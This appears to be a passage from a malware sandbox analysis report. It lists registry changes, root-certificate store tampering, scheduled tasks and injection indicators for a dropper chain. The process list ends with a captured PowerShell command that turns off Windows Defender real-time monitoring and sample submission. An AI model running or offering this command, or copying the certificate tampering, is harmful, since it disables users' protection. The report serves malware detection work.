| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe
"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
